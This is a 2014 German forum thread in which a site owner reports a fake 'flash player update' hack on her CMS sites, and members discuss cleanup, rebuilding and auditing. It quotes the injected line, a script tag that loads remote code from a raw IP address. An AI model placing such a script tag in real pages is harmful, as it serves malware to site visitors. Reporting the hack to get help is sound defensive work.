mediengestalter.info
FAQ :: Mitgliederliste :: MGi Team

Willkommen auf dem Portal für Mediengestalter

Aktuelles Datum und Uhrzeit: Fr 29.03.2024 16:06 Benutzername: Passwort: Auto-Login

Thema: Websites gehackt vom 22.10.2014


Neues Thema eröffnen   Neue Antwort erstellen MGi Foren-Übersicht -> Web-Software -> Websites gehackt
Autor Nachricht
Abenaa
Threadersteller

Dabei seit: 30.06.2008
Ort: Sachsen
Alter: -
Geschlecht: Weiblich
Verfasst Mi 22.10.2014 14:49
Titel

Websites gehackt

Antworten mit Zitat Zum Seitenanfang

Es ist nun schon zum zweiten Mal, dass unsere Webseiten gehackt wurden. Auf diesem Webserver befinden sich zwei Seiten mit zwei verschiedenen CMS. Ich wollte einmal nachfragen, ob vielleicht jemand diesen Hack kennt? Es handelt sich um einen "A flash player update is required to view this content hack". Folgendes Javascript wird in sämtliche index-Dateien, nicht nur PHP auch HTML eingeschleust:

Code:
<script src="http://23.254.131.54/script.php"></script>


Wenn die jeweilige Seite dann aufgerufen wird, erscheint nur noch unten stehende Meldung. Kennt jemand diesen Hack und wie man dieser Sache Herr werden könnte? Vielen Dank im Voraus.

Es wurden bereits alle Passwörter für alle Zugänge, auch FTP, geändert.




Zuletzt bearbeitet von Abenaa am Mi 22.10.2014 14:50, insgesamt 1-mal bearbeitet
  View user's profile Private Nachricht senden
Mac

Dabei seit: 26.08.2005
Ort: Köln
Alter: 62
Geschlecht: Männlich
Verfasst Do 23.10.2014 07:13
Titel

Antworten mit Zitat Zum Seitenanfang

cms updaten, bestehende daten auf schadcode scannen. unbekanntes löschen.
  View user's profile Private Nachricht senden Website dieses Benutzers besuchen
Anzeige
Anzeige
remote

Dabei seit: 10.11.2006
Ort: /var/www/
Alter: 109
Geschlecht: Männlich
Verfasst Do 23.10.2014 10:11
Titel

Antworten mit Zitat Zum Seitenanfang

a) server wegschmeissen und neu aufsetzen.
oder
b) jemanden bezahlen der in der lage ist einen gründlichen audit von code, datenbank und system durchzuführen.
und
c) in zukunft jemanden bezahlen der eure systeme wartet und sicher hält


nach einem hack passwörter zu ändern ist relativ witzlos.
ihr könnt davon ausgehen, dass bereits backdoors platziert wurden über die der/die angreifer beliebigen code auf eurem system ausführen können. wenn ihr glück habt und das system gut konfiguriert war, ist der befall wenigstens nur auf den webserver begrenzt. sicher sein kann man sich da aber auch nicht.

da ihr schon zum zweiten mal oper eines hacks seid, fehlt es offenbar an der befähigung eure webseiten sicher zu betreiben.
tut dem restlichen internet einen gefallen und lasst das jemanden für euch machen der es kann.
  View user's profile Private Nachricht senden
Abenaa
Threadersteller

Dabei seit: 30.06.2008
Ort: Sachsen
Alter: -
Geschlecht: Weiblich
Verfasst Do 23.10.2014 14:12
Titel

Antworten mit Zitat Zum Seitenanfang

Ich weiß nicht, ob Strato einfach so den Server wegschmeißt Lächel

Danke für die Antwort. Ich werde Deinen Rat befolgen und all das, was mich nichts angeht, in andere Hände geben.
  View user's profile Private Nachricht senden
pantonine

Dabei seit: 03.03.2011
Ort: gehen Sie bitte weiter…
Alter: -
Geschlecht: -
Verfasst Do 23.10.2014 19:57
Titel

Antworten mit Zitat Zum Seitenanfang

Zitat:
nach einem hack passwörter zu ändern ist relativ witzlos.
Bei allem Respekt, aber: Nach einem Hack Passwörter nicht zu ändern, ist relativ verantwortungslos.
  View user's profile Private Nachricht senden
remote

Dabei seit: 10.11.2006
Ort: /var/www/
Alter: 109
Geschlecht: Männlich
Verfasst Do 23.10.2014 20:04
Titel

Antworten mit Zitat Zum Seitenanfang

pantonine hat geschrieben:
Zitat:
nach einem hack passwörter zu ändern ist relativ witzlos.
Bei allem Respekt, aber: Nach einem Hack Passwörter nicht zu ändern, ist relativ verantwortungslos.


nach eine hack passwörter zu ändern ist relativ witzlos, wenn man nicht auch einen gründlichen audit macht um auszuschliessen, dass backdoors im system verbleiben oder die neuen passwörter gleich wieder abgefischt werden. die schlösser an der tür austauschen ist witzlos, wenn die tür aus den angeln gehoben wurde.

happy?
  View user's profile Private Nachricht senden
pantonine

Dabei seit: 03.03.2011
Ort: gehen Sie bitte weiter…
Alter: -
Geschlecht: -
Verfasst Do 23.10.2014 20:23
Titel

Antworten mit Zitat Zum Seitenanfang

Nö. Im Zweifel häng ich erstmal die Tür wieder ein. Sonst kommt nämlich jeder Depp rein.
  View user's profile Private Nachricht senden
remote

Dabei seit: 10.11.2006
Ort: /var/www/
Alter: 109
Geschlecht: Männlich
Verfasst Do 23.10.2014 20:24
Titel

Antworten mit Zitat Zum Seitenanfang

pantonine hat geschrieben:
Nö. Im Zweifel häng ich erstmal die Tür wieder ein. Sonst kommt nämlich jeder Depp rein.


mein reden.
ich glaub ich lass das mit den passenden analogien und setzte in zukunft wieder auf autovergleiche.
  View user's profile Private Nachricht senden
 
Ähnliche Themen [Info] Joomla-Seite gehackt, was tun?
Abwicklung von Störfällen bei Websites
Beste CMS für mehrsprachige Websites
"Blog" zum einbau in Websites
Neues Thema eröffnen   Neue Antwort erstellen
MGi Foren-Übersicht -> Web-Software


Du kannst keine Beiträge in dieses Forum schreiben.
Du kannst auf Beiträge in diesem Forum nicht antworten.
Du kannst an Umfragen in diesem Forum nicht mitmachen.